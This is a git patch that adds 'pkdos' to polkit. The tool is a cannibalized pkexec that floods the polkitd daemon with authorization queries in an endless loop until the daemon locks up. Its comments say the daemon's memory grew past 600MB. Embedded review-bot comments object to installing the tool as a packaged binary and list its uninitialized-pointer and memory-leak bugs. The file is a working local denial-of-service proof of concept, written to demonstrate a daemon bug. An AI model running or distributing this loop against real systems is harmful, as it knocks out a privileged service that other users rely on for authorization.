From c4d9172f1df845ab0efa5f0fbe58ae04ee33a8cb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Petr=20Mr=C3=A1zek?=
Date: Thu, 15 Jul 2010 05:53:13 +0200
Subject: [PATCH] polkitd DoS utility
---
 src/programs/Makefile.am | 16 ++++-
 src/programs/pkdos.c | 161 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 176 insertions(+), 1 deletions(-)
 create mode 100644 src/programs/pkdos.c
diff --git a/src/programs/Makefile.am b/src/programs/Makefile.am
index 5c8a26f..a896e00 100644
--- a/src/programs/Makefile.am
+++ b/src/programs/Makefile.am
@@ -17,7 +17,7 @@ INCLUDES = \
 # ----------------------------------------------------------------------------------------------------
-bin_PROGRAMS = pkexec pkcheck pkaction
+bin_PROGRAMS = pkexec pkcheck pkaction pkdos
 # ----------------------------------------------------------------------------------------------------
@@ -70,6 +70,20 @@ pkcheck_LDADD = \
 # ----------------------------------------------------------------------------------------------------
+pkdos_SOURCES = pkdos.c
+
+pkdos_CFLAGS = \
+ $(GLIB_CFLAGS) \
+ $(NULL)
+
+pkdos_LDADD = \
+ $(GLIB_LIBS) \
+ $(top_builddir)/src/polkit/libpolkit-gobject-1.la \
+ $(NULL)
+
+
+# ----------------------------------------------------------------------------------------------------
+
 pkaction_SOURCES = pkaction.c
 pkaction_CFLAGS = \
diff --git a/src/programs/pkdos.c b/src/programs/pkdos.c
new file mode 100644
index 0000000..7536ec8
--- /dev/null
+++ b/src/programs/pkdos.c
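Review bot: `bin_PROGRAMS = pkexec pkcheck pkaction pkdos` installs the new tool into every user's PATH as a supported, packaged binary, while the file it builds describes itself as a demonstration that makes polkitd lock up and grow past 600MB. A proof-of-concept that drives a local denial of service against a privileged system daemon should not ship with the package; build it as `noinst_PROGRAMS = pkdos` (or keep it out of the tree and attach it to the bug report) so that the daemon-side fix, not the tool, is what gets released. The `pkdos_CFLAGS`/`pkdos_LDADD` rules in the second hunk mirror the other programs and are fine as written.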
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2008 Red Hat, Inc.
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+ * License as published by the Free Software Foundation; either
+ * version 2 of the License, or (at your option) any later version.
+ *
+ * This library is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * Lesser General Public License for more details.
+ *
+ * You should have received a copy of the GNU Lesser General
+ * Public License along with this library; if not, write to the
+ * Free Software Foundation, Inc., 59 Temple Place, Suite 330,
+ * Boston, MA 02111-1307, USA.
+ *
+ * Author: David Zeuthen
+ * Changes by: Petr Mrazek
+ */
+
+/* Cannibalized pkexec.
+ * This just DoSes the daemon with (almost) limitless queries.
+ */
+
+#ifdef HAVE_CONFIG_H
+# include "config.h"
+#endif
+
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+
+#include
+
+static void
+usage (int argc, char *argv[])
+{
+ g_printerr ("pkdos --version |\n"
+ " --help |\n"
+ "\n"
+ "This serves only as a demostration of a problem in polkitd.\n");
+}
+
+/* ---------------------------------------------------------------------------------------------------- */
+
+int
+main (int argc, char *argv[])
+{
+ guint n;
+ guint ret;
+ gboolean opt_show_help;
+ gboolean opt_show_version;
+ PolkitAuthority *authority;
+ PolkitAuthorizationResult *result;
+ PolkitSubject *subject;
+ PolkitDetails *details;
+ GError *error;
+ gchar *action_id;
+ pid_t pid_of_caller;
+ int counter;
+
+ ret = 127;
+ authority = NULL;
+ subject = NULL;
+ details = NULL;
+ result = NULL;
+ action_id = NULL;
+ counter = 0;
+
+ /* First process some basic options.
+ */
+ opt_show_help = FALSE;
+ opt_show_version = FALSE;
+ for (n = 1; n < (guint) argc; n++)
+ {
+ if (strcmp (argv[n], "--help") == 0)
+ {
+ opt_show_help = TRUE;
+ }
+ else if (strcmp (argv[n], "--version") == 0)
+ {
+ opt_show_version = TRUE;
+ }
+ else
+ {
+ break;
+ }
+ }
+
+ if (opt_show_help)
+ {
+ usage (argc, argv);
+ ret = 0;
+ goto out;
+ }
+ else if (opt_show_version)
+ {
+ g_print ("pkdos version %s\n", PACKAGE_VERSION);
+ ret = 0;
+ goto out;
+ }
+
+ /* Initialize the GLib type system - this is needed to interact with the
+ * PolicyKit daemon
+ */
+ g_type_init ();
+
+ /* now check if the program that invoked us is authorized */
+ pid_of_caller = getppid ();
+ if (pid_of_caller == 1)
+ {
+ /* getppid() can return 1 if the parent died (meaning that we are reaped
+ * by /sbin/init); get process group leader instead - for example, this
+ * happens when launching via gnome-panel (alt+f2, then 'pkexec gedit').
+ */
+ pid_of_caller = getpgrp ();
+ }
+
+ subject = polkit_unix_process_new (pid_of_caller);
+ if (subject == NULL)
+ {
+ g_printerr ("No such process for pid %d: %s\n", (gint) pid_of_caller, error->message);
+ g_error_free (error);
+ goto out;
+ }
+
+ authority = polkit_authority_get ();
+ details = NULL;
+ action_id = "i.like.icecream"; // Totally arbitrary. I really do though :)
+ error = NULL;
+
+ /* The real meat of the 'program'.
+ * Ask for authorization over and over again until the daemon locks up.
+ * Also, I'm being nice here by providing a way out.
+ */
+ while (counter != INT_MAX)
+ {
+ result = polkit_authority_check_authorization_sync (authority,
+ subject,
+ action_id,
+ details,
+ POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION,
+ NULL,
+ &error);
+ counter++;
+ if(counter % 1000 == 0)
+ {
+ g_printerr (".");
+ }
+ error = NULL;
+ }
+ // Freeing up resources is not a priority. It locks up anyway.
+ // During testing, the memory usage of the *daemon* grew over 600MB. Strange?
+ out:
+ return ret;
+}
+
-- 
1.7.1.1
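Review bot: `error` is read before it is ever assigned in the `subject == NULL` branch — it is declared without an initializer, `polkit_unix_process_new (pid_of_caller)` takes no GError out-parameter, and `error = NULL;` is only set several lines later, so `error->message` and `g_error_free (error)` there dereference an indeterminate pointer. Initialize it with the other locals (`error = NULL;` next to `result = NULL;`) and drop the dereference, e.g. `g_printerr ("No such process for pid %d\n", (gint) pid_of_caller);`. In the loop, `error = NULL;` discards whatever GError the daemon returned without freeing it and `result` is never unreffed, so the client leaks one object per iteration on top of whatever the daemon may be holding; `g_clear_error (&error);` plus `if (result != NULL) g_object_unref (result);` at the end of the loop body would keep client-side growth out of the daemon-memory measurement the closing comment relies on. The normal exit path also falls through to `out:` with `ret` still at 127, which reads as a failure to anything driving this from a script.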